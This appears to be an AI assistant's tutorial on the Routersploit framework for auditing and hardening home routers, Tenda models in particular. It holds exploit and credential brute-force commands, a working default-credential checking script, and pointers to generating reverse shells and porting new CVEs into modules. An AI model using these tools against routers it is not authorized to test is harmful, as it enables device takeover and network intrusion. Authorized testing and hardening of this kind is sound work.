Routersploit Exploitation Framework
**Routersploit** is an open-source exploitation framework specifically designed for **embedded devices** — especially routers, IoT gateways, cameras, and similar low-power network hardware. It's like a "Metasploit for routers": it helps you **discover**, **test**, and (in controlled/authorized scenarios) **exploit** known vulnerabilities in these devices.
In your scenario (securing your own Tenda router, building skills to offer router cleanup/hardening services in Nairobi), Routersploit is one of the **best tools** because:
- Many home/SOHO routers (Tenda, TP-Link, D-Link, Huawei, ZTE, etc.) have old firmware with public exploits.
- It has **autopwn** — runs the vulnerability check of every applicable exploit (and default-credential) module against a target in one pass.
- It includes scanners, credential testers, and generic exploits that catch common Tenda issues (command injection, path traversal, auth bypass, etc.), even if no exact "Tenda AC10" module exists.
**Important ethical/legal reminder**
Use **only** on:
- Your own router
- Lab devices / vulnerable firmware in VMs
- Client routers with **written permission** (e.g., WhatsApp: "I authorize testing and fixing my router")
Never on random/public/unauthorized networks — that's illegal.
### 1. Installation on Kali Linux
Routersploit is **not** pre-installed in Kali. Kali does ship a `routersploit` package (`sudo apt install routersploit`), but cloning the official repo (threat9/routersploit) gives you the current module tree and is easier to update and to edit. Check the repo's commit history before relying on it for recent vulnerabilities: upstream activity has been sporadic, so do not assume that new CVEs get modules.
Run these in terminal:
```bash
sudo apt update
sudo apt install -y git python3-venv
git clone https://github.com/threat9/routersploit.git
cd routersploit
# Current Kali/Debian mark the system Python as externally managed, so a
# system-wide "sudo pip install" is refused. Use a venv inside the checkout.
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
(Optional, only needed for the Bluetooth LE modules; bluepy compiles a native helper and needs the glib headers):
```bash
sudo apt install -y libglib2.0-dev pkg-config
pip install bluepy
```
To start it (from the checkout, with the venv active; root is not needed for the HTTP/telnet modules):
```bash
python3 rsf.py
```
You'll see an ASCII banner and a prompt like:
```
rsf >
```
To update later (do this before each engagement to pick up any new modules):
```bash
cd routersploit            # wherever you cloned it
git pull
source venv/bin/activate
pip install -r requirements.txt --upgrade
```
### 2. Basic Interface & Commands (Metasploit-like)
Routersploit uses the same style as Metasploit:
| Command | What it does | Example |
|---|---|---|
| `help` | Show all commands | |
| `search <keyword>` | Find modules by path (e.g., `search tenda`, `search telnet`, `search creds`) | `search http` |
| `use <module/path>` | Load a module | `use scanners/autopwn` |
| `show options` | List the module's target and module options with their current values | |
| `show info` | Module description, references and the devices/firmware it targets | |
| `set <option> <value>` | Set an option (e.g., target IP) | `set target 192.168.0.1` |
| `check` | Run only the module's non-destructive vulnerability check | |
| `run` or `exploit` | Execute the module | |
| `back` | Unload the module and return to the main prompt | |
| `exit` | Quit | |
Global options (set once for all modules):
```bash
setg target 192.168.0.1
```
### 3. Main Module Categories
- **scanners/** — `autopwn` plus per-category scans (`routers/router_scan`, `cameras/camera_scan`, `misc/misc_scan`); they run each module's check without exploiting (safest to start with)
- **exploits/** — Try to exploit (RCE, auth bypass, credential/config disclosure, DoS)
  - Subfolders: routers/, cameras/, generic/, misc/
- **creds/** — Default-credential and brute-force checks for telnet, ssh, ftp, http Basic/Digest and snmp
- **payloads/** — Generate reverse/bind shells for the router's CPU architecture (mipsle, mipsbe, armle, x86) once you already have command execution
### 4. Most Useful Modules for Your Tenda / Home Router Scenario
#### A. autopwn — The Killer Feature (Auto Everything)
This fingerprints the target and runs the vulnerability check of every exploit module (and, by default, the default-credential modules) against it. It only **reports**; it does not exploit anything.
```bash
use scanners/autopwn
show options                 # confirm option names for your version
set target 192.168.0.1       # Your Tenda gateway IP
set http_port 80             # 80 or 443; show options lists the HTTPS toggle
run
```
What you'll see:
- Fingerprinting output (brand/model/firmware hints taken from banners and page content)
- One line per module tested: `[+] ... is vulnerable` or `[-] ... is not vulnerable`; modules whose check could not be completed are listed separately
- A closing summary of the modules that reported the device vulnerable
- To act on a hit, `use` that module yourself (section C); autopwn itself does not give you a shell
For Tenda, hits are usually default credentials, exposed telnet, or older HTTP command-injection modules. A clean run means only that no shipped module matched; it does not mean the firmware is patched.
#### B. Credential Testing (Very Common on Tenda Defaults)
First confirm how the admin page authenticates: open it in a browser or `curl -I http://192.168.0.1/`. A `401` with `WWW-Authenticate: Basic` or `Digest` means the modules below apply. A `200` with an HTML login form means the router uses form login (most current Tenda UIs do), and these modules will not find anything; test the form manually or with a form-aware tool.
```bash
search default                 # confirm the exact module path in your version
use creds/generic/http_basic_digest_default
set target 192.168.0.1
run
```
Or brute-force:
```bash
use creds/generic/http_basic_digest_bruteforce
show options                                           # option names as printed there
set target 192.168.0.1
set usernames admin                                    # or file:///path/to/users.txt
set passwords file:///path/to/router_passwords.txt     # short, router-focused list
set stop_on_success true
run
```
Keep the wordlists short and router-specific: rockyou.txt is a 14-million-entry password list (not a username list), budget routers' web servers are slow, and some lock the account after a handful of failures.
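What the default-credential module is doing under the hood is a loop of authenticated GETs. The script below is an added example, not Routersploit code: it reproduces that check, with the auth-scheme probe described above, against a constructed stand-in router served on localhost so it runs offline. The credential list, realm string and the accepted `admin:1234` pair are all made up for the demo.

```python
"""Default-credential check against an HTTP Basic-auth admin page.

Added example, not part of Routersploit: mirrors what a module like
creds/generic/http_basic_digest_default does, run against a constructed
stand-in router on localhost so it works offline.
"""
import base64
import http.server
import threading
import urllib.error
import urllib.request

# Constructed user:pass list in the shape of routersploit's defaults.txt.
# Illustrative only, not a vendor list.
DEFAULT_CREDS = ["admin:admin", "admin:password", "admin:1234", "root:root"]


class _FakeRouter(http.server.BaseHTTPRequestHandler):
    """Stand-in admin page: Basic auth, accepts admin:1234 (constructed)."""

    VALID = "Basic " + base64.b64encode(b"admin:1234").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><title>Wireless Router</title></html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Router Admin"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_router():
    """Serve the stand-in on an ephemeral localhost port; returns the server."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _FakeRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe_auth_scheme(url):
    """Return the WWW-Authenticate header from an unauthenticated GET, or None.

    A 401 carrying 'Basic' means Basic-auth credential modules apply; a 200
    (typically an HTML login form) means they do not.
    """
    try:
        with urllib.request.urlopen(url, timeout=3):
            return None
    except urllib.error.HTTPError as err:
        return err.headers.get("WWW-Authenticate") if err.code == 401 else None


def try_basic_creds(url, creds):
    """Return the first user:pass the target accepts, or None.

    Stops on any response that is neither 200 nor 401, so a lockout or a
    block page is noticed instead of hammered.
    """
    for pair in creds:
        token = base64.b64encode(pair.encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            with urllib.request.urlopen(req, timeout=3) as resp:
                if resp.status == 200:
                    return pair
        except urllib.error.HTTPError as err:
            if err.code != 401:
                return None
    return None


def demo(creds=DEFAULT_CREDS):
    """Run the check against the constructed router; returns (scheme, hit)."""
    srv = start_fake_router()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/"
        scheme = probe_auth_scheme(url)
        hit = try_basic_creds(url, creds) if scheme and scheme.startswith("Basic") else None
        return scheme, hit
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())  # ('Basic realm="Router Admin"', 'admin:1234')
```

Point `demo` at a real target by replacing the constructed server with the router's URL; the stop-on-unexpected-status rule is the part worth keeping, since a router that starts answering 403 or resetting connections is telling you to stop.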
#### C. Specific Exploit Examples (Generic Ones That Hit Tenda Often)
Search first:
```bash
search injection
search path
search telnet
search http
```
Modules that hit many budget routers (including some Tenda models/firmwares); confirm each path with `search`, since the module tree changes between versions:
- `exploits/routers/generic/http_command_injection`
- `exploits/routers/generic/path_traversal`
- `exploits/routers/belkin/n750_rce` (similar request patterns)
- `exploits/routers/dlink/dir859_auth_bypass_cmd_exec` (auth bypass + cmd exec)
Tenda's web UI routes form submissions through `/goform/...` handlers (for example `formSetDeviceName`); note those paths from the browser's developer tools so you can tell whether a generic module's request actually matches the firmware in front of you.
Example usage:
```bash
use exploits/routers/<vendor>/<module>   # path copied from the search output
show info                                # which devices/firmware it targets
show options                             # option names differ per module
set target 192.168.0.1
check                                    # non-destructive: is the target vulnerable?
run                                      # RCE modules typically open a cmd > prompt on success
```
Once you have command execution, run `cat /proc/cpuinfo` to identify the CPU, then use the matching `payloads/` module (mipsle, mipsbe or armle for most routers) to generate a reverse shell.
### 5. Workflow for Your Router Service Gigs
1. Nmap service/version scan first → confirm open ports (80/23/443/etc.) and note banners
2. Run `scanners/autopwn` → show the client the `[+] ... is vulnerable` lines
3. If default/weak creds are found → demo the login
4. If an exploit works → show read-only proof (`cat /etc/passwd`, `uname -a`); do not `reboot` a client's router as a demo
5. **Immediately fix** (firmware update, disable WAN-side management, telnet and UPnP, new admin and Wi-Fi passwords, WPA2-AES or WPA3), then confirm the old credentials no longer work
6. Re-run autopwn → the earlier hits should now read `[-] ... is not vulnerable`; if the firmware is end-of-life and a hit remains, say so in the report and mitigate (restrict management to the LAN, or recommend replacing the router)
7. Charge KSh 4k–8k and give a simple before/after report
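Steps 2, 6 and 7 above come down to diffing two autopwn runs. The script below is an added example, not part of Routersploit: it parses the per-module status lines autopwn prints, compares a pre-fix and a post-fix run, and produces the before/after summary for the report, including the case where a hit survives the fix. The sample output is constructed to match the shape of those lines; its module names are placeholders, not real module paths.

```python
"""Before/after report from saved Routersploit autopwn output.

Added example, not part of Routersploit. Save each autopwn run to a file,
parse the "[+] ... is vulnerable" / "[-] ... is not vulnerable" lines, and
report what the fixes changed. Sample text below is constructed; the module
names in it are placeholders.
"""
import re

LINE = re.compile(
    r"^\[(?P<mark>[+\-])\]\s+(?P<host>\S+):(?P<port>\d+)\s+(?P<svc>\S+)\s+"
    r"(?P<module>\S+)\s+is (?P<neg>not )?vulnerable"
)

# Constructed pre-fix run: one info leak, telnet default creds, one unverified module.
BEFORE = """\
[*] 192.168.0.1 Starting vulnerability check...
[-] 192.168.0.1:80 http exploits/routers/vendor_x/old_rce is not vulnerable
[+] 192.168.0.1:80 http exploits/routers/vendor_x/info_leak is vulnerable
[+] 192.168.0.1:23 telnet creds/generic/telnet_default is vulnerable
[*] 192.168.0.1 Could not verify exploitability:
 - 192.168.0.1:80 http exploits/routers/vendor_y/dos
[*] 192.168.0.1 Elapsed time: 12.3 seconds
"""

# Constructed post-fix run: telnet closed, but the info leak has no firmware fix.
AFTER = """\
[-] 192.168.0.1:80 http exploits/routers/vendor_x/old_rce is not vulnerable
[+] 192.168.0.1:80 http exploits/routers/vendor_x/info_leak is vulnerable
[-] 192.168.0.1:23 telnet creds/generic/telnet_default is not vulnerable
"""


def parse_autopwn(text):
    """Map module path -> True if reported vulnerable, False if not.

    Banner lines and the "could not verify" block do not match the regex and
    are skipped, so the result only covers modules autopwn decided on.
    """
    results = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            results[m["module"]] = m["neg"] is None
    return results


def compare(before, after):
    """Return {'fixed', 'still_open', 'new'}: sorted module lists."""
    vuln_before = {m for m, v in parse_autopwn(before).items() if v}
    vuln_after = {m for m, v in parse_autopwn(after).items() if v}
    return {
        "fixed": sorted(vuln_before - vuln_after),
        "still_open": sorted(vuln_before & vuln_after),
        "new": sorted(vuln_after - vuln_before),
    }


def report(before, after):
    """Plain-text summary to hand to the router owner."""
    d = compare(before, after)
    lines = [f"Fixed ({len(d['fixed'])}):"] + [f"  - {m}" for m in d["fixed"]]
    lines += [f"Still open ({len(d['still_open'])}):"] + [f"  - {m}" for m in d["still_open"]]
    if d["new"]:
        lines += ["New since first scan:"] + [f"  - {m}" for m in d["new"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(BEFORE, AFTER))
```

Pipe the real runs in with `python3 rsf.py | tee before.txt` and read the files instead of the constructed strings; a non-empty "Still open" section is exactly the thing to put in writing for the client rather than paper over.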
### 6. Tips & Gotchas for 2026
- Recent Tenda vulnerabilities (e.g., CVE-2025-1851 AC7 buffer overflow, CVE-2026-1690 HG10 RCE) are unlikely to have modules yet. Read the advisory or PoC, test the request manually, or port the PoC into a module.
- Routersploit is Python-based → modules are short and readable; the exploit tree lives under `routersploit/modules/exploits/` (e.g., `routers/<vendor>/`), and copying an existing module for a similar device is the quickest way to write a new one.
- If no exact match → combine with Nuclei templates and Nmap's `vuln` scripts.
- `git pull` before each engagement, and check the commit log to see whether upstream is actually adding modules rather than assuming it.
Run `use scanners/autopwn` on your Tenda now (set target to 192.168.0.1 or whatever your gateway is) and paste the output here. I'll help interpret what it found and what to fix next.
Want deeper on a specific module (e.g., how to use payloads for reverse shell on router)? Or help modifying a module for a Tenda CVE? Just say. Let's master this tool! 🛡️